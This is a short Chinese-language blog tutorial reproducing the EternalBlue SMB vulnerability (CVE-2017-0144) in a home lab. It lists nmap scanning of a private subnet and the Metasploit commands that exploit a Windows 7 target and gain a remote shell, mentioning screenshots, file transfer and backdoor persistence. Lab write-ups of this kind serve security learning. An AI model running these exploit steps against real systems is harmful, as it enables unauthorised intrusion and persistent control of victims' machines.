永恒之蓝漏洞(CVE-2017-0144)复现

1|0永恒之蓝漏洞(CVE-2017-0144)复现


1|1环境搭建


一台kali攻击机

一台windows7靶机

1|2信息收集


ifconfig 查看kali的ip地址为192.168.125.25

使用nmap扫描192.168.125.0网段下存活的主机

nmap 192.168.125.25/24

判断靶机ip地址为192.168.125.151

nmap -O 192.168.125.151

判断靶机为Windows 7|2008|8.1

1|3使用永恒之蓝进行攻击


msfconsole进入metasploit控制台

search ms17_010

这里使用exploit/windows/smb/ms17_010_eternalblue进行攻击

use exploit/windows/smb/ms17_010_eternalblue

使用永恒之蓝漏洞

show options

查看漏洞利用所需的基本设置

set RHOSTS 192.168.125.151

这里只用设置目标ip地址

run 执行攻击

已经成功反弹shell,可以执行截屏,文件上传下载,后门持久化等操作


__EOF__

本文作者LRainner
本文链接https://www.cnblogs.com/LRainner/p/15966460.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   LRainner  阅读(594)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
点击右上角即可分享
微信分享提示